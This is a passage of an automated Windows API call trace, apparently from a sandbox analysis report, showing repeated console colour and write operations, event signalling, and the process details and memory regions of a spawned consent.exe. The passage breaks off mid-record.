[0160.796] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.796] GetLastError () returned 0xcb [0160.796] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0160.796] GetLastError () returned 0xcb [0160.796] CloseHandle (hObject=0x5f) returned 1 [0160.797] GetLastError () returned 0xcb [0160.802] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.802] GetLastError () returned 0xcb [0160.802] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.802] GetLastError () returned 0xcb [0160.802] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0160.803] GetLastError () returned 0xcb [0160.803] CloseHandle (hObject=0x5f) returned 1 [0160.803] GetLastError () returned 0xcb [0160.808] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.848] GetLastError () returned 0xcb [0160.848] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x601eedc | out: lpMode=0x601eedc) returned 1 [0160.849] GetLastError () returned 0xcb [0160.849] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601eedc, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x601eedc*=0x1) returned 1 [0160.849] GetLastError () returned 0xcb [0160.849] CloseHandle (hObject=0x5f) returned 1 [0160.849] GetLastError () returned 0xcb [0160.853] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0160.854] GetLastError () returned 0xcb [0160.854] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x601eea8 | out: lpConsoleScreenBufferInfo=0x601eea8) returned 1 [0160.854] GetLastError () returned 0xcb [0160.854] GetConsoleOutputCP () returned 0x1b5 [0160.854] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.854] GetLastError () returned 0xcb [0160.858] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63 [0160.858] GetLastError () returned 0xcb [0160.858] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.858] GetLastError () returned 0xcb [0160.861] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67 [0160.862] GetLastError () returned 0xcb [0160.862] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.862] GetLastError () returned 0xcb [0160.865] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.865] GetLastError () returned 0xcb [0160.865] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.866] GetLastError () returned 0xcb [0160.866] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0160.866] GetLastError () returned 0xcb [0160.866] CloseHandle (hObject=0x6b) returned 1 [0160.866] GetLastError () returned 0xcb [0160.870] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.870] GetLastError () returned 0xcb [0160.870] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.870] GetLastError () returned 0xcb [0160.870] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0160.870] GetLastError () returned 0xcb [0160.870] CloseHandle (hObject=0x6b) returned 1 [0160.871] GetLastError () returned 0xcb [0160.875] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.875] GetLastError () returned 0xcb [0160.875] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x601ee9c | out: lpMode=0x601ee9c) returned 1 [0160.875] GetLastError () returned 0xcb [0160.875] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x2df7fb0*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x601ee9c, lpReserved=0x0 | out: lpBuffer=0x2df7fb0*, lpNumberOfCharsWritten=0x601ee9c*=0x19) returned 1 [0160.875] GetLastError () returned 0xcb [0160.875] CloseHandle (hObject=0x6b) returned 1 [0160.876] GetLastError () returned 0xcb [0160.880] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.880] GetLastError () returned 0xcb [0160.880] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.880] GetLastError () returned 0xcb [0160.880] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0160.880] GetLastError () returned 0xcb [0160.880] CloseHandle (hObject=0x6b) returned 1 [0160.881] GetLastError () returned 0xcb [0160.884] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.922] GetLastError () returned 0xcb [0160.922] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0160.923] GetLastError () returned 0xcb [0160.923] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0160.923] GetLastError () returned 0xcb [0160.923] CloseHandle (hObject=0x6b) returned 1 [0160.923] GetLastError () returned 0xcb [0160.927] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.927] GetLastError () returned 0xcb [0160.927] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x601eedc | out: lpMode=0x601eedc) returned 1 [0160.928] GetLastError () returned 0xcb [0160.928] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601eedc, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x601eedc*=0x1) returned 1 [0160.928] GetLastError () returned 0xcb [0160.928] CloseHandle (hObject=0x6b) returned 1 [0160.928] GetLastError () returned 0xcb [0160.933] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0160.933] GetLastError () returned 0xcb [0160.933] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x601eea8 | out: lpConsoleScreenBufferInfo=0x601eea8) returned 1 [0160.934] GetLastError () returned 0xcb [0160.934] GetConsoleOutputCP () returned 0x1b5 [0160.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.934] GetLastError () returned 0xcb [0160.939] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f [0160.939] GetLastError () returned 0xcb [0160.939] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.939] GetLastError () returned 0xcb [0160.943] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73 [0160.944] GetLastError () returned 0xcb [0160.944] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0160.944] GetLastError () returned 0xcb [0160.948] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.948] GetLastError () returned 0xcb [0160.948] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.948] GetLastError () returned 0xcb [0160.948] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0160.949] GetLastError () returned 0xcb [0160.949] CloseHandle (hObject=0x77) returned 1 [0160.949] GetLastError () returned 0xcb [0160.953] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.953] GetLastError () returned 0xcb [0160.953] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0160.953] GetLastError () returned 0xcb [0160.954] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0160.954] GetLastError () returned 0xcb [0160.954] CloseHandle (hObject=0x77) returned 1 [0160.954] GetLastError () returned 0xcb [0160.958] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0160.996] GetLastError () returned 0xcb [0160.996] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x601ee9c | out: lpMode=0x601ee9c) returned 1 [0160.996] GetLastError () returned 0xcb [0160.996] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2df8348*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x601ee9c, lpReserved=0x0 | out: lpBuffer=0x2df8348*, lpNumberOfCharsWritten=0x601ee9c*=0x36) returned 1 [0160.996] GetLastError () returned 0xcb [0160.997] CloseHandle (hObject=0x77) returned 1 [0160.997] GetLastError () returned 0xcb [0161.000] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0161.001] GetLastError () returned 0xcb [0161.001] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0161.001] GetLastError () returned 0xcb [0161.001] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0161.001] GetLastError () returned 0xcb [0161.001] CloseHandle (hObject=0x77) returned 1 [0161.001] GetLastError () returned 0xcb [0161.005] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0161.005] GetLastError () returned 0xcb [0161.005] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0161.005] GetLastError () returned 0xcb [0161.005] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0161.006] GetLastError () returned 0xcb [0161.006] CloseHandle (hObject=0x77) returned 1 [0161.006] GetLastError () returned 0xcb [0161.010] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0161.010] GetLastError () returned 0xcb [0161.010] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x601eedc | out: lpMode=0x601eedc) returned 1 [0161.011] GetLastError () returned 0xcb [0161.011] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601eedc, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x601eedc*=0x1) returned 1 [0161.011] GetLastError () returned 0xcb [0161.011] CloseHandle (hObject=0x77) returned 1 [0161.011] GetLastError () returned 0xcb [0161.015] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0161.016] GetLastError () returned 0xcb [0161.016] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x601eea8 | out: lpConsoleScreenBufferInfo=0x601eea8) returned 1 [0161.016] GetLastError () returned 0xcb [0161.016] GetConsoleOutputCP () returned 0x1b5 [0161.016] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0161.016] GetLastError () returned 0xcb [0161.019] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b [0161.020] GetLastError () returned 0xcb [0161.020] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0161.020] GetLastError () returned 0xcb [0161.023] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f [0161.023] GetLastError () returned 0xcb [0161.023] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x601ee48 | out: lpConsoleScreenBufferInfo=0x601ee48) returned 1 [0161.023] GetLastError () returned 0xcb [0161.027] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.027] GetLastError () returned 0xcb [0161.027] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0161.027] GetLastError () returned 0xcb [0161.027] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0161.027] GetLastError () returned 0xcb [0161.027] CloseHandle (hObject=0x83) returned 1 [0161.027] GetLastError () returned 0xcb [0161.030] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.031] GetLastError () returned 0xcb [0161.031] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x601ee50 | out: lpConsoleScreenBufferInfo=0x601ee50) returned 1 [0161.031] GetLastError () returned 0xcb [0161.031] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0161.031] GetLastError () returned 0xcb [0161.031] CloseHandle (hObject=0x83) returned 1 [0161.127] GetLastError () returned 0xcb [0161.130] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.130] GetLastError () returned 0xcb [0161.130] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x601ee9c | out: lpMode=0x601ee9c) returned 1 [0161.131] GetLastError () returned 0xcb [0161.131] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2df8740*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601ee9c, lpReserved=0x0 | out: lpBuffer=0x2df8740*, lpNumberOfCharsWritten=0x601ee9c*=0x1) returned 1 [0161.131] GetLastError () returned 0xcb [0161.131] CloseHandle (hObject=0x83) returned 1 [0161.131] GetLastError () returned 0xcb [0161.134] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.135] GetLastError () returned 0xcb [0161.135] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0161.135] GetLastError () returned 0xcb [0161.135] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0161.135] GetLastError () returned 0xcb [0161.135] CloseHandle (hObject=0x83) returned 1 [0161.135] GetLastError () returned 0xcb [0161.138] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.138] GetLastError () returned 0xcb [0161.138] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x601ee4c | out: lpConsoleScreenBufferInfo=0x601ee4c) returned 1 [0161.139] GetLastError () returned 0xcb [0161.139] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0161.139] GetLastError () returned 0xcb [0161.139] CloseHandle (hObject=0x83) returned 1 [0161.139] GetLastError () returned 0xcb [0161.142] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0161.143] GetLastError () returned 0xcb [0161.143] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x601eedc | out: lpMode=0x601eedc) returned 1 [0161.143] GetLastError () returned 0xcb [0161.143] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x601eedc, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x601eedc*=0x1) returned 1 [0161.143] GetLastError () returned 0xcb [0161.143] CloseHandle (hObject=0x83) returned 1 [0161.143] GetLastError () returned 0xcb [0161.150] SetEvent (hEvent=0x34c) returned 1 [0161.150] GetLastError () returned 0xcb [0161.150] SetEvent (hEvent=0x350) returned 1 [0161.150] GetLastError () returned 0xcb [0161.150] SetEvent (hEvent=0x328) returned 1 [0161.150] GetLastError () returned 0xcb [0161.150] SetEvent (hEvent=0x330) returned 1 [0161.151] GetLastError () returned 0xcb [0161.151] SetEvent (hEvent=0x364) returned 1 [0161.151] GetLastError () returned 0xcb [0161.151] SetEvent (hEvent=0x358) returned 1 [0161.151] GetLastError () returned 0xcb [0161.151] SetEvent (hEvent=0x35c) returned 1 [0161.151] GetLastError () returned 0xcb [0161.151] SetEvent (hEvent=0x360) returned 1 [0161.151] GetLastError () returned 0xcb [0161.151] SetEvent (hEvent=0x368) returned 1 [0161.151] GetLastError () returned 0xcb [0161.151] CoUninitialize () Thread: id = 202 os_tid = 0xbb4 [0161.217] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0161.236] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.237] VirtualQuery (in: lpAddress=0x607e5b0, lpBuffer=0x607f5b0, dwLength=0x1c | out: lpBuffer=0x607f5b0*(BaseAddress=0x607e000, AllocationBase=0x56f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0161.238] VirtualQuery (in: lpAddress=0x607e6cc, lpBuffer=0x607f6cc, dwLength=0x1c | out: lpBuffer=0x607f6cc*(BaseAddress=0x607e000, AllocationBase=0x56f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.242] SetEvent (hEvent=0x3c8) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] SetEvent (hEvent=0x3cc) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] SetEvent (hEvent=0x3d4) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] SetEvent (hEvent=0x3c8) returned 1 [0161.242] GetLastError () returned 0x0 [0161.242] SetEvent (hEvent=0x3cc) returned 1 [0161.242] GetLastError () returned 0x0 [0161.243] SetEvent (hEvent=0x3e4) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] SetEvent (hEvent=0x3d8) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] SetEvent (hEvent=0x3dc) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] SetEvent (hEvent=0x3e0) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] SetEvent (hEvent=0x3e8) returned 1 [0161.243] GetLastError () returned 0x0 [0161.243] CoUninitialize () Process: id = "14" image_name = "consent.exe" filename = "c:\\windows\\system32\\consent.exe" page_root = "0x61aa000" os_pid = "0x850" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x36c" cmd_line = "consent.exe 876 342 0000000001F5B860" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2122 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2123 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2124 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2125 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2126 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2127 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2128 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2129 start_va = 0xfff30000 end_va = 0xfff4dfff entry_point = 0xfff30000 region_type = mapped_file name = "consent.exe" filename = "\\Windows\\System32\\consent.exe" (normalized: "c:\\windows\\system32\\consent.exe") Region: id = 2130 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2131 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2132 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2133 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2134 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2135 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2136 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2137 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2138 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2139 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2140 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2141 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0xd0000 region_type = mapped_file name = "consent.exe.mui" filename = "\\Windows\\System32\\en-US\\consent.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\consent.exe.mui") Region: id = 2142 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2143 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2144 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2145 start_va = 